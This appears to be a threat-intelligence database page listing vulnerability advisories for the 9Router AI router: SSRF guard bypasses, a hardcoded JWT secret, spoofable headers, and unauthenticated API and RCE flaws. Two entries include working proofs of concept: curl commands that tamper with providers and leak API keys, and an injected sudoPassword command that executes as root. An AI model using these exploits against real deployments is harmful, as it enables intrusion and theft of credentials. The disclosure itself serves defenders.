Threat Intelligence Database
Comprehensive database of the latest cyber threats affecting organizations worldwide. Filter and search to find specific threat intelligence relevant to your organization.
Stop chasing alerts. Route them.
Start free, then upgrade once to turn Radar into an automated delivery engine for your security stack.
Custom feeds / Automations: email, Slack, webhooks, SIEM/MISP / API access (baseline limits)
API access activates after upgrading in Console -> Billing.
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.
Filter Threats
Narrow down the results by type, severity, or affected countries
Threat Intelligence
Click on any threat for detailed analysis and mitigation recommendations
0 A vulnerability was detected in decolua 9Router up to 0.5.55. The affected element is the function fetch of the file src/shared/utils/ssrfGuard.js of the component Search Endpoint. Performing a manipulation of the argument provider_options.baseUrl results in server-side request forgery. The attack can be initiated remotely. Applying a patch is the recommended action to fix this issue. Join the discussion | CVE Database V5 | 09/30/2026, 23:45:11 UTC Added: 10/01/2026, 00:03:37 UTC |
The POST /api/provider-nodes/validate route in 9router takes a caller-supplied baseUrl and issues server-side HTTP requests to it, guarding the destination with assertPublicUrl from src/shared/utils/ssrfGuard.js. That guard compares hostname strings only: it resolves no DNS, does not revalidate after a redirect, and its IPv4-mapped IPv6 branch is unreachable. The branch matches ^::ffff:(\d+\.\d+\.\d+\.\d+)$, but the WHATWG URL parser canonicalizes such literals to hextets before the guard runs, so new URL("http://[::ffff:127.0.0.1]/").hostname yields [::ffff:7f00:1] and the pattern is tested against a string it is never handed. Every IPv4-mapped address therefore passes, and http://[::ffff:7f00:1] and http://[::ffff:a9fe:a9fe] reach loopback and link-local metadata addresses; a hostname whose A record points at an internal address passes as well because no resolution occurs. In the custom-embedding branch the upstream response body is truncated to 200 bytes and returned to the caller whenever the upstream status is neither 2xx nor 401 nor 403, which discloses the beginning of internal responses, and the other validation types remain usable for blind internal port scanning through status and timing differences. The caller-supplied apiKey is forwarded to the internal destination as an Authorization Bearer header. A dashboard session is required by default, and none is required when requireLogin is disabled. Join the discussion | CVE Database V5 | 08/20/2026, 21:35:14 UTC Added: 08/20/2026, 21:54:24 UTC |
9Router is an AI router & token saver. In 0.4.45 and earlier, 9Router's src/dashboardGuard.js local-only access gate used Host and Origin headers in isLocalRequest() to protect /api/mcp/*, /api/tunnel/*, and /api/cli-tools/*, allowing header spoofing in reverse proxy or tunnel deployments to reach MCP child process stdin paths. Join the discussion | GCVE Database | 07/15/2026, 20:49:15 UTC Added: 07/02/2026, 22:56:45 UTC |
9Router is an AI router & token saver. From 0.2.21 until 0.4.44, 9Router used the hardcoded fallback JWT secret 9router-default-secret-change-me in src/app/api/auth/login/route.js, src/middleware.js, and later src/lib/auth/dashboardSession.js, allowing attackers to forge an auth_token cookie when JWT_SECRET was unset. This issue is fixed in version 0.4.44 Join the discussion | GCVE Database | 07/15/2026, 20:43:41 UTC Added: 07/02/2026, 22:56:46 UTC |
0 CVE-2026-55500 is a critical vulnerability in decolua 9router versions prior to 0.4.80. The /api/settings/database endpoint allows unauthenticated full database export and import, exposing sensitive information such as credentials, API keys, OAuth tokens, and settings. The vulnerability arises because the endpoint only requires validation via the ALWAYS_PROTECTED middleware, which accepts JWT or CLI tokens without sufficient authentication. This issue is fixed in version 0.4.80. Join the discussion | GCVE Database | 07/10/2026, 15:28:27 UTC Added: 07/06/2026, 23:02:08 UTC |
0 CVE-2026-55501 is a vulnerability in decolua 9router prior to version 0.4.80 where the dashboard login rate limiter relies on the X-Forwarded-For HTTP header to identify clients. Because this header is attacker-controlled and spoofable, an attacker can bypass the rate limiting by rotating the header value, allowing unlimited brute-force login attempts. This issue is fixed in version 0.4.80. Join the discussion | GCVE Database | 07/10/2026, 15:23:53 UTC Added: 07/06/2026, 23:02:08 UTC |
--- title: Unauthenticated CRUD on /api/providers and Full API Key Leak via /api/usage/stats product: 9Router version: <= 0.4.41 severity: critical cve_request: true --- ## Summary Multiple critical API security vulnerabilities were discovered in 9Router's Next.js dashboard. The `/api/providers` endpoints lack authentication entirely, allowing anyone to create, read, update, and delete provider connections. Additionally, `/api/usage/stats` exposes full plaintext API keys, and `/api/usage/request-logs` + `/api/usage/request-details` expose all users' request history and full conversation contents (including system prompts, user messages, assistant responses) without authentication. ## Affected Endpoints | Endpoint | Method | Issue | |---|---|---| | `/api/providers` | GET | Lists all provider connections with partial credentials, OAuth tokens, account IDs | | `/api/providers/:id` | GET | Read any single provider detail (IDOR) | | `/api/providers` | POST | Create arbitrary provider connections with attacker-controlled API keys | | `/api/providers/:id` | PUT | Modify any existing provider connection | | `/api/providers/:id` | DELETE | Delete any provider connection | | `/api/usage/stats` | GET | Exposes full plaintext API keys, per-account usage breakdown, cost data | | `/api/usage/request-logs` | GET | Exposes all users' request logs (model, tokens, cost, timestamp, provider) | | `/api/usage/request-details/:id` | GET | Exposes full conversation turns including system prompts, user messages, assistant responses | | `/api/version` | GET | Exposes current version info | | `/api/models` | GET | Exposes full model routing catalog | | `/api/v1/models` | GET | Exposes model list | ## Impact ### Critical: Provider CRUD without authentication An attacker can: 1. **Add a malicious provider** — inject a provider that proxies through their server, capturing all prompts, responses, and API keys routed through 9Router 2. **Modify existing providers** — replace API keys with attacker-controlled ones, redirect traffic 3. **Delete all providers** — cause complete denial of service 4. **Read all provider configurations** — harvest partial credentials, GitHub Copilot OAuth tokens, Cloudflare account IDs, email addresses ### Critical: Full API key leak via /api/usage/stats The endpoint returns complete API key strings (e.g., `sk-...`) in plaintext alongside usage data per key, enabling unauthorized use of connected AI provider accounts. ### Critical: Conversation history leak `/api/usage/request-details` returns the full conversation history of other users' AI sessions, including system prompts, user messages, assistant responses, tool calls, and reasoning traces. ## Steps to Reproduce ### 1. Unauthenticated read of all providers ```bash curl -s https://<host>/api/providers ``` Returns all provider connections with email addresses, auth type, account IDs, and partial API key prefixes. ### 2. Create a provider without authentication ```bash curl -X POST https://<host>/api/providers \ -H "Content-Type: application/json" \ -d '{"provider":"openai","authType":"apikey","name":"rogue","apiKey":"sk-attacker-controlled"}' ``` Returns the created connection object with a new UUID and `isActive: true`. ### 3. Modify an existing provider without authentication ```bash curl -X PUT https://<host>/api/providers/<existing-uuid> \ -H "Content-Type: application/json" \ -d '{"name":"modified","apiKey":"sk-attacker-key"}' ``` Returns the updated connection object. ### 4. Delete a provider without authentication ```bash curl -X DELETE https://<host>/api/providers/<existing-uuid> ``` Returns `{"message":"Connection deleted successfully"}`. ### 5. Read full usage stats with API keys ```bash curl -s https://<host>/api/usage/stats ``` Returns full API key strings, per-account token/cost breakdown, recent requests. ### 6. Read request logs ```bash curl -s "https://<host>/api/usage/request-logs?page=1&pageSize=50" ``` Returns paginated request logs with timestamps, models, providers, user emails, token counts. ### 7. Read full conversation ```bash curl -s https://<host>/api/usage/request-details/<request-uuid> ``` Returns complete conversation turns for that request. ### 8. Read version info ```bash curl -s https://<host>/api/version ``` Returns `{"currentVersion":"0.4.19","latestVersion":"0.4.45","hasUpdate":true}`. ## Root Cause The Next.js API routes under `src/app/api/*` lack authentication middleware on several endpoints. Specifically: - `/api/providers/*` — No auth check before CRUD operations on provider connections stored in the database - `/api/usage/stats` — No auth check before returning aggregated usage data including full API keys - `/api/usage/request-logs` — No auth check before returning request history - `/api/usage/request-details/:id` — No auth check before returning full conversation contents ## Suggested Fix 1. Add authentication middleware to all `/api/providers/*` routes (GET, POST, Join the discussion | GCVE Database | 07/06/2026, 21:22:10 UTC Added: 07/06/2026, 23:02:23 UTC |
# Unauthenticated RCE via `/api/tunnel/tailscale-install` **Affected:** `9router` (npm package) — current master (`v0.4.39`). ### Summary `POST /api/tunnel/tailscale-install` accepts a JSON body with a `sudoPassword` field and pipes it, followed by the body of `https://tailscale.com/install.sh`, into a child process spawned as `sudo -S sh`. The route is not present in the dashboard middleware matcher in `src/proxy.js`, so the request reaches the handler without invoking `dashboardGuard.proxy()`. In deployments where the Node process runs as root (Docker images derived from `node:*` without a `USER` directive, `npm i -g 9router` invoked as root, or `systemd` units without `User=`), the spawned `sh` runs as root and executes the attacker-supplied bytes. ### Details #### 1. Middleware matcher (`src/proxy.js:3-15`) ```js export const config = { matcher: [ "/", "/dashboard/:path*", "/api/shutdown", "/api/settings/:path*", "/api/keys", "/api/keys/:path*", "/api/providers/client", "/api/provider-nodes/validate", "/api/cli-tools/:path*", "/api/mcp/:path*", ], }; ``` Next.js invokes the middleware only for paths matching this list. Routes that are not listed — including the entire `/api/tunnel/*` family — do not invoke `dashboardGuard.proxy()`. No cookie, JWT, CLI token, or `Host`-header check is applied to them. #### 2. Route handler (`src/app/api/tunnel/tailscale-install/route.js:18-67`) ```js export async function POST(request) { const body = await request.json().catch(() => ({})); ... const sudoPassword = body.sudoPassword || getCachedPassword() || await loadEncryptedPassword() || ""; ... const result = await installTailscale(sudoPassword, shortId, (msg) => { send("progress", { message: msg }); }); ... } ``` `body.sudoPassword` comes from the request body and is passed to `installTailscale`, which dispatches to `installTailscaleLinux` on Linux. #### 3. Linux installation routine (`src/lib/tunnel/tailscale.js:304-341`) ```js async function installTailscaleLinux(sudoPassword, log) { log("Downloading install script..."); return new Promise((resolve, reject) => { const curlChild = spawn("curl", ["-fsSL", "https://tailscale.com/install.sh"], { ... }); let scriptContent = ""; curlChild.stdout.on("data", (d) => { scriptContent += d.toString(); }); curlChild.on("exit", (code) => { if (code !== 0) return reject(...); log("Running install script..."); const child = spawn("sudo", ["-S", "sh"], { stdio: ["pipe", "pipe", "pipe"], windowsHide: true }); ... child.stdin.write(`${sudoPassword}\n`); // ← from request body child.stdin.write(scriptContent); child.stdin.end(); }); }); } ``` The byte stream sent to the stdin of the `sudo -S sh` child process is: ``` <sudoPassword from request body>\n <https://tailscale.com/install.sh body> ``` When the caller is already root, has `NOPASSWD` configured for the user, or has a recent sudo timestamp cache, `sudo -S sh` does not read stdin for a password — it `exec`s `sh` directly. The new `sh` process inherits the stdin pipe and reads it line by line: 1. The `sudoPassword` value from the request — interpreted as the first shell command. 2. The `install.sh` body — interpreted as subsequent shell input. Appending `; exit 0` to the `sudoPassword` value causes `sh` to exit before the legitimate `install.sh` body runs. The host executes only the request-supplied bytes, as the 9router process user. Both "Docker container running as root" and "`npm i -g 9router` on a host with `NOPASSWD` sudo" reach this path. ### PoC The reproduction below is self-contained: build a representative target image (Node process running as root, with `sudo` and `curl` on `PATH`), start it, send one unauthenticated POST with `curl`, and read the file written by the payload. **Step 1 — build the target image** ```sh docker build -t 9router-vuln-root - <<'EOF' FROM node:22-bookworm-slim RUN apt-get update && apt-get install -y --no-install-recommends \ sudo curl ca-certificates \ && rm -rf /var/lib/apt/lists/* RUN npm install -g [email protected] EXPOSE 20128 CMD ["9router"] EOF ``` **Step 2 — start the target** ```sh docker run -d --rm --name target -p 127.0.0.1:20129:20128 \ 9router-vuln-root 9router --log --skip-update until curl -fs -o /dev/null http://127.0.0.1:20129/api/health; do sleep 1; done ``` **Step 3 — exploit (one unauthenticated POST)** ```sh curl -sN -X POST http://127.0.0.1:20129/api/tunnel/tailscale-install \ -H 'Content-Type: application/json' \ -d '{"sudoPassword":"id > /tmp/pwned.txt; exit 0"}' ``` **Step 4 — verify** ```sh docker exec target cat /tmp/pwned.txt # uid=0(root) gid=0(root) groups=0(root) ``` The trailing `"Tailscale not installed"` line is a consequence of `; exit 0` terminating `sh` before the legitimate `install.sh` body executed; the `id > /tmp/pwned.txt` write completed earlier in the same `sh` Join the discussion | GCVE Database | 07/02/2026, 20:17:56 UTC Added: 07/02/2026, 22:56:51 UTC |
Showing 1 to 8 of 8 results